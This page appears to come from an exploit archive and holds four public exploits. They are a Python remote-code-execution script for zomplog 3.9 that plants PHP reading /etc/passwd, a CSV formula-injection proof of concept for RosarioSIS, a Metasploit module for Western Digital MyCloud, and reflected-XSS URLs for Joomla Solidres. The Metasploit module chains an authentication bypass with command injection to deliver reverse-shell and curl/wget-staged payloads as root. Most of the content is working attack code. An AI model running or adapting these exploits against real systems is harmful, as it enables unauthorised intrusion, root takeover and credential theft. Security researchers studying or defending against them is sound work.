<pre><code>#Exploit Title: zomplog 3.9 - Remote Code Execution (RCE)<br />#Application: zomplog <br />#Version: v3.9<br />#Bugs: RCE<br />#Technology: PHP<br />#Vendor URL: http://zomp.nl/zomplog/<br />#Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip<br />#Date of found: 22.07.2023<br />#Author: Mirabbas Ağalarov<br />#Tested on: Linux <br /><br /><br />import requests<br /><br />#inputs<br />username=input('username: ')<br />password=input('password: ')<br /><br />#urls<br />login_url="http://localhost/zimplitcms/zimplit.php?action=login"<br />payload_url="http://localhost/zimplitcms/zimplit.php?action=saveE&file=Zsettings.js"<br />rename_url="http://localhost/zimplitcms/zimplit.php?action=rename&oldname=Zsettings.js&newname=poc.php"<br />poc_url="http://localhost/zimplitcms/poc.php"<br /><br /><br />#login <br />session = requests.Session()<br />login_data=f"lang=en&username={username}&password={password}&submit=Start!"<br />headers={<br /> 'Cookie' : 'ZsessionLang=en',<br /> 'Content-Type' : 'application/x-www-form-urlencoded',<br /> 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'<br /> }<br />login_req=session.post(login_url,headers=headers,data=login_data)<br /><br />if login_req.status_code == 200:<br /> print('Login OK')<br />else:<br /> print('Login promlem.')<br /> exit()<br />#payload<br />payload_data="html=ZmaxpicZoomW%2520%253D%2520%2522%2522%253C%253Fphp%2520echo%2520system('cat%2520%252Fetc%252Fpasswd')%253B%253F%253E%2522%253B%2520%250AZmaxpicZoomH%2520%253D%2520%2522150%2522%253B%2520%250AZmaxpicW%2520%253D%2520%2522800%2522%253B%2520%250AZmaxpicH%2520%253D%2520%2522800%2522%253B%2520"<br />pheaders={<br /> 'Content-Type' : 'application/x-www-form-urlencoded',<br /> 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'<br /> }<br />payload_req=session.post(payload_url,headers=pheaders,data=payload_data)<br /><br />#rename<br /><br />rename_req=session.get(rename_url)<br /><br />#poc<br />poc_req=session.get(poc_url)<br />print(poc_req.text)<br /><br /><br />#youtube poc video - https://youtu.be/nn7hieGyCFs<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: RosarioSIS 10.8.4 - CSV Injection<br /># Google Dork:NA<br /># Exploit Author: Ranjeet Jaiswal#<br /># Vendor Homepage: https://www.rosariosis.org/<br /># Software Link: https://gitlab.com/francoisjacquet/rosariosis/-/archive/v10.8.4/rosariosis-v10.8.4.zip<br /># Affected Version: 10.8.4<br /># Category: WebApps<br /># Tested on: Windows 10<br /># <br />#<br /># 1. Vendor Description:<br />#<br /># RosarioSIS has been designed to address the most important needs of administrators, teachers, support staff, parents, students, and clerical personnel. However, it also adds many components not typically found in Student Information Systems. <br />#<br /># 2. Technical Description:<br />#<br /># A CSV Injection (also known as Formula Injection) vulnerability in the RosarioSIS web application with version 10.8.4 allows malicious users to execute malicious payload in csv/xls and redirect authorized user to malicious website.<br /><br />#<br /># 3. Proof Of Concept:<br /><br /> 3.1. Proof of Concept for CSV injection.<br /><br /># #Step to reproduce.<br />Step1:Login in to RosarioSIS 10.8.4<br />Step2:Go to Periods page<br />Step3:Add CSV injection redirection payload such as "=HYPERLINK("https://www.google.com","imp")"in the Title field<br />Step4:click on Save button to save data.<br />Step5:Go to export tab and export the data<br />Step6:When user open download Periods.xls file.You will see redirection hyperlink.<br />Step7:When user click on link ,User will be redirected to Attacker or<br />malicious website.<br /><br /><br /><br /># 4. Solution:<br /> Upgrade to latest release of RosarioSIS.<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Western Digital MyCloud unauthenticated command injection',<br /> 'Description' => %q{<br /> This module exploits authentication bypass (CVE-2018-17153) and<br /> command injection (CVE-2016-10108) vulnerabilities in Western<br /> Digital MyCloud before 2.30.196 in order to achieve<br /> unauthenticated remote code execution as the root user.<br /><br /> The module first performs a check to see if the target is<br /> WD MyCloud. If so, it attempts to trigger an authentication<br /> bypass (CVE-2018-17153) via a crafted GET request to<br /> /cgi-bin/network_mgr.cgi. If the server responds as expected,<br /> the module assesses the vulnerability status by attempting to<br /> exploit a commend injection vulnerability (CVE-2016-10108) in<br /> order to print a random string via the echo command. This is<br /> done via a crafted POST request to /web/google_analytics.php.<br /><br /> If the server is vulnerable, the same command injection vector<br /> is leveraged to execute the payload.<br /><br /> This module has been successfully tested against Western Digital<br /> MyCloud version 2.30.183.<br /><br /> Note: based on the available disclosures, it seems that the<br /> command injection vector (CVE-2016-10108) might be exploitable<br /> without the authentication bypass (CVE-2018-17153) on versions<br /> before 2.21.126. The obtained results on 2.30.183 imply that<br /> the patch for CVE-2016-10108 did not actually remove the command<br /> injection vector, but only prevented unauthenticated access to it.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Erik Wynter', # @wyntererik - Metasploit<br /> 'Steven Campbell', # CVE-2016-10108 disclosure and PoC<br /> 'Remco Vermeulen' # CVE-2018-17153 disclosure and PoC<br /> ],<br /> 'References' => [<br /> ['CVE', '2016-10108'], # command injection in /web/google_analytics.php via a modified arg parameter in the POST data.<br /> ['CVE', '2018-17153'], # authentication bypass<br /> ['URL', 'https://www.securify.nl/advisory/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges/'], # CVE-2018-17153 disclosure and PoC<br /> ['URL', 'https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/'] # CVE-2016-10108 disclosure and PoC<br /> ],<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true<br /> },<br /> 'Platform' => %w[linux unix],<br /> 'Arch' => [ ARCH_ARMLE, ARCH_CMD ],<br /> 'Targets' => [<br /> [<br /> 'Unix In-Memory',<br /> {<br /> 'Platform' => [ 'unix', 'linux' ],<br /> 'Arch' => ARCH_CMD,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },<br /> 'Type' => :unix_memory<br /> }<br /> ],<br /> [<br /> 'Linux Dropper', {<br /> 'Arch' => [ARCH_ARMLE],<br /> 'Platform' => 'linux',<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',<br /> 'CMDSTAGER::FLAVOR' => :curl<br /> },<br /> 'Type' => :linux_dropper<br /> }<br /> ]<br /> ],<br /> 'CmdStagerFlavor' => ['curl', 'wget'],<br /> 'Privileged' => true,<br /> 'DisclosureDate' => '2016-12-14', # CVE-2016-10108 disclosure date<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br /> 'Reliability' => [ REPEATABLE_SESSION ]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('TARGETURI', [true, 'The base path to WD MyCloud', '/']),<br /> ])<br /> end<br /><br /> def check<br /> # sanity check to see if the target is likely WD MyCloud<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path)<br /> })<br /><br /> return CheckCode::Unknown('Connection failed.') unless res<br /><br /> return CheckCode::Safe('Target is not a WD MyCloud application.') unless res.code == 200 && res.body.include?('var MODEL_ID = "WDMyCloud')<br /><br /> print_status("#{rhost}:#{rport} - The target is WD MyCloud. Checking vulnerability status...")<br /> # try the authentication bypass (CVE-2018-17153)<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'network_mgr.cgi'),<br /> 'vars_get' => {<br /> 'cmd' => 'cgi_get_ipv6',<br /> 'flag' => 1 # this cannot be randomized according to the CVE-2018-17153 details<br /> }<br /> })<br /><br /> return CheckCode::Unknown('Connection failed while attempting to trigger the authentication bypass.') unless res<br /><br /> return CheckCode::Unknown("Received unexpected response code #{res.code} while attempting to trigger the authentication bypass.") unless res.code == 404<br /><br /> # send a command to print a random string via echo. if the target is vulnerable, both the command and the command output will be part of the response body<br /> echo_cmd = "echo #{Rex::Text.rand_text_alphanumeric(8..42)}"<br /> print_status("#{rhost}:#{rport} - Attempting to execute #{echo_cmd}...")<br /> res = execute_command(echo_cmd, { 'wait_for_response' => true })<br /><br /> return CheckCode::Unknown('Connection failed while trying to execute the echo command to check the vulnerability status.') unless res<br /><br /> return CheckCode::Vulnerable('The target executed the echo command.') if res.code == 200 && res.body.include?(echo_cmd) && res.body.include?('"success":true')<br /><br /> CheckCode::Safe('The target failed to execute the echo command.')<br /> end<br /><br /> def execute_command(cmd, opts = {})<br /> request_hash = {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'web', 'google_analytics.php'),<br /> 'cookie' => 'username=admin',<br /> 'vars_post' => {<br /> 'cmd' => 'set',<br /> 'opt' => 'cloud-device-num',<br /> 'arg' => "0|echo `#{cmd}` #"<br /> }<br /> }<br /><br /> return send_request_cgi(request_hash) if opts['wait_for_response']<br /><br /> # if we are trying to execute the payload, we can just yeet it at the server and return without waiting for a response<br /> send_request_cgi(request_hash, 0)<br /> end<br /><br /> def exploit<br /> if target.arch.first == ARCH_CMD<br /> print_status("#{rhost}:#{rport} - Executing the payload. This may take a few seconds...")<br /> execute_command(payload.encoded)<br /> else<br /> execute_cmdstager(background: true)<br /> end<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: Joomla Solidres 2.13.3 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 28/07/2023<br /># Vendor: Solidres Team<br /># Vendor Homepage: http://solidres.com/<br /># Software Link: https://extensions.joomla.org/extension/vertical-markets/booking-a-reservations/solidres/<br /># Demo: http://demo.solidres.com/joomla<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site <br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br />GET parameter 'show' is vulnerable to XSS<br />GET parameter 'reviews' is vulnerable to XSS<br />GET parameter 'type_id' is vulnerable to XSS<br />GET parameter 'distance' is vulnerable to XSS<br />GET parameter 'facilities' is vulnerable to XSS<br />GET parameter 'categories' is vulnerable to XSS<br />GET parameter 'prices' is vulnerable to XSS<br />GET parameter 'location' is vulnerable to XSS<br />GET parameter 'Itemid' is vulnerable to XSS<br /><br /><br />https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=[XSS]<br /><br />https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&reviews=[XSS]&facilities=18&<br /><br />https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=[XSS]<br /><br />https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=[XSS]&facilities=14<br /><br />https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=[XSS]<br /><br />https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-25&distance=0-25&categories=[XSS]<br /><br />https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=d2tff&ordering=distance&direction=asc&prices=[XSS]<br /><br />https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=[XSS]&task=hub.search&ordering=score&direction=desc&type_id=11<br /><br />https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=[XSS]&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=14<br /><br /><br /><br />[-] Done<br /></code></pre>
